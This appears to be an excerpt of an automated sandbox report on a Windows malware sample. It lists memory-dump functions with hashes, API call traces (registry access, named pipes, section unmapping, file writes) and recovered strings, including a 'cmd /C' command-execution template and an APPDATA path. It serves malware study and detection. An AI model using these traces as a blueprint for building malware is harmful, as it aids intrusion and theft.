  • Instruction Fuzzy Hash: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • lstrlen.KERNEL32(00000000,?,00000F00), ref: 001C79CB
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • StrTrimA.SHLWAPI(00000000,001E53D4), ref: 001C7A55
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7A72
  • DeleteFileA.KERNEL32(00000000,00000000,?,?,001ECE60,00000000,?,00000F00), ref: 001C7A7A
  • HeapFree.KERNEL32(00000000,00000000,001ECE60), ref: 001C7A89
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7D61, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 75 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: memcpy$RtlAllocateHeap
  • String ID: [URL]$https://
  • API String ID: 3738462082-2839221783
  • Opcode ID: afc151603a67bdcf01d5cf8a846d0f5f8a912d4aa94ead1b687b7b5f553c7413
  • Instruction ID: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
  • Opcode Fuzzy Hash: 21E02B245D1F02D6D85A20845438BB7C6873D42394CAE7766C950255772A25B174B588
  • Instruction Fuzzy Hash: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
APIs
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
  • memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
  • memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
  • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C771B, Relevance: 10.6, APIs: 7, Instructions: 71 Total matches: 62memoryfilestring
Similarity
  • Total matches: 62
  • API ID: HeapFree$CloseHandleCreateFileRtlAllocateHeaplstrlenmbstowcs
  • String ID:
  • API String ID: 1841334458-0
  • Opcode ID: 88abf7bf9e6c094b0eee3fb77fa4d18763972b4349be3218ed9dbfc152fe13ca
  • Instruction ID: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
  • Opcode Fuzzy Hash: 2BE02B71181D5096C02719A68C58339E6056F422E4E5D4627FA013910FB24317E8EBAB
  • Instruction Fuzzy Hash: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C7527: LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 001C75DB
    • Part of subcall function 001C7527: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001C75FC
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
  • lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
  • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
  • mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C7B90: GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
    • Part of subcall function 001C7B90: memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
    • Part of subcall function 001C7B90: RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
    • Part of subcall function 001C7B90: lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7B90: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
  • CloseHandle.KERNEL32(?), ref: 001C77C0
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2416, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 50memorystringthread
Similarity
  • Total matches: 50
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFreeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 1766977795-0
  • Opcode ID: b41ce86395a358d9a6be2e887350fb16e7ee7d04885f28ea6336c7c9663497fb
  • Instruction ID: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
  • Opcode Fuzzy Hash: A8E026A5068C0583807778228061BAF9B82BAC10D8C8D7123FE402614B2F037487DF2B
  • Instruction Fuzzy Hash: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
APIs
  • lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
  • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
  • lstrcpy.KERNEL32(00000008,?), ref: 001C2462
  • CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
  • CloseHandle.KERNEL32(00000000), ref: 001C2485
  • GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4EEE, Relevance: 9.2, APIs: 6, Instructions: 187 Total matches: 61memorystringthread
Similarity
  • Total matches: 61
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeaplstrcmplstrlenwsprintf
  • String ID:
  • API String ID: 236900386-0
  • Opcode ID: 0432ee343612a59173c04e27a8b524be30c23a17c6314db2962a76565d5ddb3c
  • Instruction ID: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
  • Opcode Fuzzy Hash: F7119B31058EC2A7441760C18092BBED450FC920E580D37F2EEB86A2CE6F43258B2B1B
  • Instruction Fuzzy Hash: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
APIs
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C46AF
    • Part of subcall function 001C45F0: WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C473C
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
    • Part of subcall function 001C45F0: RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
    • Part of subcall function 001D829C: lstrlen.KERNEL32(?,00000000,001EABBC,?,001C194F,?), ref: 001D82A6
    • Part of subcall function 001D829C: StrRChrA.SHLWAPI(?,00000000,0000002E), ref: 001D82D1
    • Part of subcall function 001D829C: lstrcat.KERNEL32(00000000,?), ref: 001D8317
  • lstrcmp.KERNEL32(?,?), ref: 001C4F65
  • GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
  • GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C1916: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C192A
    • Part of subcall function 001C1916: RegCloseKey.ADVAPI32(?), ref: 001C1958
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
  • wsprintfA.USER32 ref: 001C50B7
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C8CA3, Relevance: 9.1, APIs: 6, Instructions: 72 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: HeapFreelstrlen$mbstowcswcstombs
  • String ID:
  • API String ID: 2099024402-0
  • Opcode ID: e75e910ff2ec0d94baf6de8394c43fdc3fb5dca6cdb9e0b5bf2cf534734101ee
  • Instruction ID: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
  • Opcode Fuzzy Hash: 88E02BB20C04C297060710B3847577DDA09BCC21D100E53ABDB08EC34DA68723A5BB6F
  • Instruction Fuzzy Hash: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
APIs
  • lstrlenW.KERNEL32(?), ref: 001C8CC7
  • wcstombs.NTDLL ref: 001C8CE7
    • Part of subcall function 001C8B4E: RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,?,?), ref: 001C8C27
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
  • lstrlen.KERNEL32(00000000), ref: 001C8D0B
  • mbstowcs.NTDLL ref: 001C8D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D3F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D59
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B34B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 4915370d64bf5c115dcc7df05119504ed8106c73e5c20004021290fc9b098e04
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: A8D0126D078B4ED4D91985A715E2F03E1915F33700E3C460872607926A8B3673AEDF49
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(01B37494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 01B34B26
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B33
  • WriteFile.KERNEL32(00000000,?,00001000,01B37494,00000000), ref: 01B34B49
  • SetEndOfFile.KERNEL32(00000000,?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B54
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B5C
  • CloseHandle.KERNEL32(00000000), ref: 01B34B65
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001DD36B, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 207 Total matches: 57sleepsynchronization
Similarity
  • Total matches: 57
  • API ID: SetLastErrorSleepWaitForSingleObjectmemset
  • String ID: vids
  • API String ID: 1012678829-3767230166
  • Opcode ID: a88323ab6a07f6567de602f156fbacf356d172862014bdadb632bb7e4ac17ede
  • Instruction ID: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
  • Opcode Fuzzy Hash: E1216B4906CCE1E3D8E268440463F6D32146F83DFAD4DA72667BE9A6D75F012306D629
  • Instruction Fuzzy Hash: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
APIs
  • memset.NTDLL ref: 001DD3C6
  • SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD348: GetSystemTimeAsFileTime.KERNEL32(00000001,?,?,?,001DD513,?,00000000,00000000,?,?,?,?,00000000,?,?,?), ref: 001DD351
    • Part of subcall function 001DD348: _aulldiv.NTDLL(00000001,?,00002710,00000000), ref: 001DD364
  • WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
  • Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C838C, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102 Total matches: 54memory
Similarity
  • Total matches: 54
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: https://
  • API String ID: 3817218409-4275131719
  • Opcode ID: f288712f8a6e8bd0bf07739e93ef791456e10643a80339435031cd9f7b6ed460
  • Instruction ID: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
  • Opcode Fuzzy Hash: 18F08B601A85C2A6802718C294AC7B2C604BE80AC0D8D536FFF503929E5FA770D5BB0A
  • Instruction Fuzzy Hash: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
APIs
    • Part of subcall function 001C5ADD: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5AEB
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C83ED
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C843C
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8471
  • HeapFree.KERNEL32(00000000,?), ref: 001C8481
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4202, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63 Total matches: 53memoryregistry
Similarity
  • Total matches: 53
  • API ID: HeapFreeRegCloseKeyRegOpenKeyRtlAllocateHeap
  • String ID: Main
  • API String ID: 1238789381-521822810
  • Opcode ID: 430bf3c3e099aaf98ba0d13378e5d8da2de179d3274a2f5d09db6df723472999
  • Instruction ID: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
  • Opcode Fuzzy Hash: CAE026B00A45C5AA403B7C81647B2F29410F9A08C20CD976BEE009F28CAE4670A27B9A
  • Instruction Fuzzy Hash: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
APIs
  • RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
  • HeapFree.KERNEL32(00000000,?), ref: 001C428F
  • RegCloseKey.ADVAPI32(?), ref: 001C4298
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C29BF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41 Total matches: 45memorystring
Similarity
  • Total matches: 45
  • API ID: CreateDirectoryHeapFreeRtlAllocateHeaplstrlen
  • String ID: %APPDATA%\Microsoft\
  • API String ID: 3959905781-2699254172
  • Opcode ID: a91e168cb75582dc69dc678417b6008db4073c04297a41e19573c560bdc487dc
  • Instruction ID: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
  • Opcode Fuzzy Hash: 10D05EB0444802AB953BA426806A739884A7F823D0C5E7536E9404A26FBB9362956E6A
  • Instruction Fuzzy Hash: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
  • lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9EAA, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33 Total matches: 56memorystring
Similarity
  • Total matches: 56
  • API ID: lstrlen$RtlAllocateHeap
  • String ID: [FILE]$DllRegisterServer
  • API String ID: 2544908171-3029713317
  • Opcode ID: 2d4b95e8c34fd7eb35c32aaba08f5fcf9921a6e8c8be63207aa385bfa2f516c2
  • Instruction ID: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
  • Opcode Fuzzy Hash: 73C012709914038B04177926842423CC68A39957E540E0619E8473611A5B0302CD5A1E
  • Instruction Fuzzy Hash: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
APIs
  • lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
  • lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAF14, Relevance: 7.7, APIs: 5, Instructions: 174 Total matches: 40memory
Similarity
  • Total matches: 40
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeapmemcpywsprintf
  • String ID:
  • API String ID: 3372225998-0
  • Opcode ID: 61e3c6596c7711a58e405f94e11cad7776fca466765ac99ea6157a7d77fb77b6
  • Instruction ID: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
  • Opcode Fuzzy Hash: B6110E75048A40CF89337492402A6BBDA81BD914C798C9763E90C3A5AF4903F29B7F07
  • Instruction Fuzzy Hash: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • wsprintfA.USER32 ref: 001CB04B
  • memcpy.NTDLL(00000000,?,?), ref: 001CB090
  • InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
    • Part of subcall function 001C5B7B: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
    • Part of subcall function 001C5B7B: memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
    • Part of subcall function 001C5B7B: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
    • Part of subcall function 001C5B7B: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001C5B7B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C8B4E, Relevance: 7.6, APIs: 5, Instructions: 125 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpy$RtlAllocateHeap
  • String ID:
  • API String ID: 1281497405-0
  • Opcode ID: c91cc279de764e5f2579d6076ec579c7e1ff7f10485d5d5ea4a8a547ad6caca9
  • Instruction ID: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
  • Opcode Fuzzy Hash: D1014E13C804C3878807342E9024AB8C449BE822C0DCDD316AA081C13F8BA232B7764F
  • Instruction Fuzzy Hash: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
APIs
    • Part of subcall function 001C8692: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C86CC
  • RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
  • memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
  • memcpy.NTDLL(00000000,?,?), ref: 001C8C27
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C45F0, Relevance: 7.6, APIs: 5, Instructions: 121 Total matches: 58memoryregistrysynchronization
Similarity
  • Total matches: 58
  • API ID: HeapFree$RegCloseKeyWaitForSingleObject
  • String ID:
  • API String ID: 3052965740-0
  • Opcode ID: d3c070adaf0f083c3fd626d879ba680c8654bd575e600ed9f9379d1952a7449c
  • Instruction ID: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
  • Opcode Fuzzy Hash: 1B01F521055AD313C12BA88192BA3FA8505BF829E1D4D1737FEB81E18C5F4721E6A707
  • Instruction Fuzzy Hash: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • HeapFree.KERNEL32(00000000,?), ref: 001C46AF
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
  • HeapFree.KERNEL32(00000000,?), ref: 001C473C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
  • RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7878, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: HeapFree$RtlAllocateHeaplstrlenwsprintf
  • String ID:
  • API String ID: 4063120414-0
  • Opcode ID: 82a566ac4b7e44f40389d82a26e71ca4d0b382ca24f9de814279e5df00d9b999
  • Instruction ID: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
  • Opcode Fuzzy Hash: 10F0F4A4112C418A8C56A6F1989CB7852C85B925FDD4E3313A76C314EB3B13335EBE4D
  • Instruction Fuzzy Hash: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • lstrlen.KERNEL32(00000000,001ECDBE,00000000,001ECDAC,00000000,001ECD98,00000000,001ECE3B,00000000,001ECE30,00000000,001ECD88,00000000,00002334), ref: 001C792A
  • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 001C793F
  • wsprintfA.USER32 ref: 001C7954
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C796E
    • Part of subcall function 001C7664: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
